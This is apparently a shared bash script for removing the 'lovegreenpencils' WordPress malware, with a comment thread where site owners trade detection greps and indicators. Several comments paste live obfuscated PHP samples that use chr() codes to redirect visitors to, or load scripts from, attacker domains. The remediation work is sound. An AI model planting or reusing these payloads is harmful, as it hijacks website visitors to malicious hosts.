Fixes love green pencils wordpress malware

FixLoveGreenPencilsMalware.sh

#!/bin/bash

# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g"

totalInfections=0
filesProcessed=0

echo "Welcome to lovegreenpencils malware fixer by black-dragon74"
echo "This fix is divided into 3 phases."
echo "Phase 1 fixes the \`beckup\` files."
echo "Phase 2 fixes the header injections."
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections"
echo

# Begin phase 1
read -p "Press any key to begin the phase 1: " yay
clear
echo "Scanning....."
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}"

	((filesProcessed ++))
done

echo "Phase 1 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0

# Begin phase 2
read -p "Press any key to begin the phase 2: " yay
clear
echo "Scanning....."
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}"

	((filesProcessed ++))
done

echo "Phase 2 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0

# Begin phase 3
read -p "Press any key to begin the phase 3: " yay
clear
echo "Scanning....."
for f in $(grep -ril "lovegreenpencils" ./*); do
	
	# Don't fix the fixer itslef :D
	if [[ $f == "./fix.sh" ]]; then
		continue;
	fi

	# If a backup exists, we created it, don't process it again
	if [[ $(echo $f | grep ".perlbak") ]]; then
		continue;
	fi

	# Otherwise fix all files recursively
	echo "Found file $f"
	echo "Backing up and fixing the infection"
	echo
	perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}"

	((filesProcessed ++))
done

echo "Phase 3 complete. Processed $filesProcessed files."
((totalInfections += filesProcessed))
filesProcessed=0


# Processing complete.
echo
echo "Found, backed up and fixed $totalInfections infected files."
read -p "Processing complete. Press any key to exit. " yay
exit 0

I have found a new variation that is getting injected into a couple hundred files. I attempted to download your tool and update it to the new variation I found but it seems like I am doing it wrong.

Here is the new variation:

<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>

Do you have cPanel on your hosting account ? If yes, you should have Terminal app to launch thoses commands

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

Hello,

I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./* to find the new variation ?

I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do

Hello,

I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./* to find the new variation ?

Thank you! I will try this.

If think I found the plugin that have the backdoor. Is a nuked version of elementor Pro

Usually, the hacker infect large amount of file. Beware and launch the grep command on root directory.
Check if you haven't file call "lte_" or something on the root then check if you haven't got any maintenance.php or maintenance folder or wp-sheeep on plugin folder also check if you don"t have wp-stream.php file on root as well.

The best thing I thinks once the cleaning done, its to export DB, Export uploads/ themes/ plugins/ and reinstall fresh WP.

I am getting this error when running the script:

I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>